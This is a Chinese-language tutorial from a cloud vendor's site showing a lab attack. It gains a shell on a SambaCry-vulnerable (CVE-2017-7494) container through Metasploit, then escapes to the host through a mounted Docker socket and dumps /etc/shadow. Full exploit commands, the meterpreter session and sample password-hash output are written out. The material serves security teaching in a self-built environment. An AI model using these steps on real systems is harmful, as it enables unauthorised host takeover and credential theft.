<th id="t6n1j"></th>

溫馨提示×

溫馨提示×

您好，登錄后才能下訂單哦！

密碼登錄×

忘記密碼？

登錄注冊×

獲取短信驗(yàn)證碼

其他方式登錄

點(diǎn)擊登錄注冊即表示同意《億速云用戶服務(wù)條款》

用戶登錄×

賬戶密碼登錄

請使用微信掃描上方二維碼

使用幫助

請求超時(shí)！

請點(diǎn)擊重新獲取二維碼

如何利用Docker容器的不安全部署獲取宿主機(jī)權(quán)限

發(fā)布時(shí)間：2021-08-30 22:10:14 來源：億速云閱讀：216 作者：chen 欄目：編程語言

這篇文章主要介紹“如何利用Docker容器的不安全部署獲取宿主機(jī)權(quán)限”，在日常操作中，相信很多人在如何利用Docker容器的不安全部署獲取宿主機(jī)權(quán)限問題上存在疑惑，小編查閱了各式資料，整理出簡單好用的操作方法，希望對大家解答”如何利用Docker容器的不安全部署獲取宿主機(jī)權(quán)限”的疑惑有所幫助！接下來，請跟著小編一起來學(xué)習(xí)吧！

實(shí)驗(yàn)環(huán)境設(shè)置

由于我們將使用容器，因此你必須安裝docker。

創(chuàng)建網(wǎng)絡(luò)

首先，我們在創(chuàng)建容器的地方創(chuàng)建一個(gè)docker網(wǎng)絡(luò)：

docker network create pwnage

啟動易受攻擊的容器

在本示例中，我將使用受SambaCry漏洞（CVE-2017-7494）影響的容器。有關(guān)該漏洞的更多信息，可以參閱opsxcq/exploit-CVE-2017-7494。

此漏洞允許你在Samba服務(wù)器中遠(yuǎn)程代碼執(zhí)行，我們將docker socket添加到容器中，以下是一個(gè)濫用docker的示例。

docker run --rm -it \
       --name vulnerable \
       --network pwnage \
       -v '/var/run/docker.sock:/var/run/docker.sock' \
       vulnerables/cve-2017-7494

啟動攻擊機(jī)

實(shí)驗(yàn)環(huán)境設(shè)置完成后，接下來我們需要將攻擊者的主機(jī)添加到網(wǎng)絡(luò)中。Samba Cry存儲庫中有一個(gè)漏洞利用代碼，但這里我將使用Metasploit，因?yàn)樗菀咨蟼魑宜璧膬?nèi)容。我已經(jīng)為此構(gòu)建了一個(gè)映像，只需運(yùn)行bellow命令，所有內(nèi)容都將根據(jù)實(shí)驗(yàn)環(huán)境需要運(yùn)行：

docker run --rm -it \
       --network pwnage \
       -v '/usr/bin/docker:/docker:ro' \
       strm/metasploit

加載完成后，你將看到如下界面。

如何利用Docker容器的不安全部署獲取宿主機(jī)權(quán)限

攻擊利用

信息收集

在任何攻擊或測試中，信息收集都是必不可少的一個(gè)環(huán)節(jié)。因此，讓我們先來ping下易受攻擊的容器檢查下當(dāng)前的連接情況。

ping -c 2 vulnerable

如果一切正常，你應(yīng)該能看到以下輸出信息。

msf5 > ping -c 2 vulnerable 
[*] exec: ping -c 2 vulnerable 

PING vulnerable (172.20.0.2) 56(84) bytes of data.
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=1 ttl=64 time=0.120 ms
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=2 ttl=64 time=0.097 ms

--- vulnerable ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1009ms
rtt min/avg/max/mdev = 0.097/0.108/0.120/0.015 ms

然后，我們進(jìn)行基本的smb共享枚舉：

use auxiliary/scanner/smb/smb_enumshares
set rhosts vulnerable
run

輸出結(jié)果如下：

msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts vulnerable
rhosts => vulnerable
msf5 auxiliary(scanner/smb/smb_enumshares) > run

[+] 172.20.0.2:139        - data - (DS) Data
[+] 172.20.0.2:139        - IPC$ - (I) IPC Service (Crying samba)
[*] vulnerable:           - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

可以看到，這個(gè)samba服務(wù)器中有一個(gè)名為data的共享。

獲取shell

下一步我們要做的是，針對宿主機(jī)運(yùn)行漏洞利用程序獲取shell。在Metasploit中，該漏洞名為is_known_pipename，位于exploit/linux/samba/is_known_pipename。

運(yùn)行bellow命令攻擊宿主機(jī)：

use exploit/linux/samba/is_known_pipename
set RHOST vulnerable
set RPORT 445
set payload linux/x64/meterpreter/bind_tcp
set TARGET 3
set SMB_FOLDER data
set SMBUser sambacry
set SMBPass nosambanocry
exploit

如果一切順利，你將獲取到一個(gè)meterpreter shell。如下：

msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > set RHOST vulnerable
RHOST => vulnerable
msf5 exploit(linux/samba/is_known_pipename) > set RPORT 445
RPORT => 445
msf5 exploit(linux/samba/is_known_pipename) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(linux/samba/is_known_pipename) > set TARGET 3
TARGET => 3
msf5 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER data
SMB_FOLDER => data
msf5 exploit(linux/samba/is_known_pipename) > set SMBUser sambacry
SMBUser => sambacry
msf5 exploit(linux/samba/is_known_pipename) > set SMBPass nosambanocry
SMBPass => nosambanocry
msf5 exploit(linux/samba/is_known_pipename) > exploit

[*] vulnerable:445 - Using location \\vulnerable\data\ for the path
[*] vulnerable:445 - Retrieving the remote path of the share 'data'
[*] vulnerable:445 - Share 'data' has server-side path '/data
[*] vulnerable:445 - Uploaded payload to \\vulnerable\data\shyyEPPk.so
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using \\PIPE\/data/shyyEPPk.so...
[-] vulnerable:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using /data/shyyEPPk.so...
[-] vulnerable:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Started bind TCP handler against vulnerable:4444
[*] Sending stage (816260 bytes) to vulnerable

meterpreter >

提權(quán)

我們將通過濫用容器內(nèi)可用的docker socket來提權(quán)。由于docker在宿主機(jī)上是以root身份運(yùn)行的，因此它也具有root權(quán)限。我們可以濫用它來執(zhí)行多項(xiàng)操作。例如，使用--privileged選項(xiàng)可以為我們提供許多擴(kuò)展功能，以下是從docker官方文檔中提取的解釋文本：

默認(rèn)情況下，Docker的容器是沒有特權(quán)的，例如不能在容器中再啟動一個(gè)容器。這是因?yàn)槟J(rèn)情況下容器是不能訪問任何其它設(shè)備的。但是通過"privileged"，容器就擁有了訪問任何其它設(shè)備的權(quán)限。當(dāng)操作者執(zhí)行docker run --privileged時(shí)，Docker將擁有訪問主機(jī)所有設(shè)備的權(quán)限，同時(shí)Docker也會在apparmor或者selinux做一些設(shè)置，使容器可以容易的訪問那些運(yùn)行在容器外部的設(shè)備。

你可以使用--device選項(xiàng)訪問設(shè)備。但在本示例中，我將映射toor文件系統(tǒng) (/) 到容器中并訪問它。

由于此容器中沒有docker客戶端，因此下一步我們要做的就是在目標(biāo)容器中設(shè)置docker客戶端及其依賴項(xiàng)。你只需運(yùn)行以下命令，即可完成所有這些操作。

upload /docker /docker
upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
chmod 777 /docker
chmod +x /docker

meterpreter > upload /docker /docker
[*] uploading  : /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] uploaded   : /docker -> /docker
meterpreter > upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploading  : /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] Uploaded -1.00 B of 38.47 KiB (-0.0%): /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploaded   : /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
meterpreter > chmod 777 /docker
meterpreter > chmod +x /docker
meterpreter >

現(xiàn)在，我們就可以使用docker來訪問宿主機(jī)上的文件系統(tǒng)了。

execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"

我們來轉(zhuǎn)儲下本地用戶的哈希，輸出結(jié)果如下：

meterpreter > execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"
Process 113 created.
Channel 13 created.
root:$1$UFKdtFGw$qp29y1qGWit/vnvIG0uSr1:17488:0:99999:7:::
daemon:*:17488:0:99999:7:::
bin:*:17488:0:99999:7:::
sys:*:17488:0:99999:7:::
sync:*:17488:0:99999:7:::
games:*:17488:0:99999:7:::
man:*:17488:0:99999:7:::
lp:*:17488:0:99999:7:::
mail:*:17488:0:99999:7:::
news:*:17488:0:99999:7:::

到此，關(guān)于“如何利用Docker容器的不安全部署獲取宿主機(jī)權(quán)限”的學(xué)習(xí)就結(jié)束了，希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí)，快去試試吧！若想繼續(xù)學(xué)習(xí)更多相關(guān)知識，請繼續(xù)關(guān)注億速云網(wǎng)站，小編會繼續(xù)努力為大家?guī)砀鄬?shí)用的文章！

向AI問一下細(xì)節(jié)

推薦閱讀：

免責(zé)聲明：本站發(fā)布的內(nèi)容（圖片、視頻和文字）以原創(chuàng)、轉(zhuǎn)載和分享為主，文章觀點(diǎn)不代表本網(wǎng)站立場，如果涉及侵權(quán)請聯(lián)系站長郵箱：is@yisu.com進(jìn)行舉報(bào)，并提供相關(guān)證據(jù)，一經(jīng)查實(shí)，將立刻刪除涉嫌侵權(quán)內(nèi)容。

上一篇新聞：
如何使用SSH和SFTP協(xié)議
下一篇新聞：
JDK的安裝配置過程

猜你喜歡

AI
助
手

產(chǎn)品服務(wù)

地區(qū)劃分

專題活動

幫助支持

關(guān)于我們

售后咨詢

7*24小時(shí)在線電話：400-100-2938

7*24小時(shí)在線 QQ：800811969

關(guān)注億速云

億速云公眾號

手機(jī)網(wǎng)站二維碼

<center id="9cutg"></center>

<rt id="9cutg"></rt>

<strike id="9cutg"><em id="9cutg"><div id="9cutg"></div></em></strike>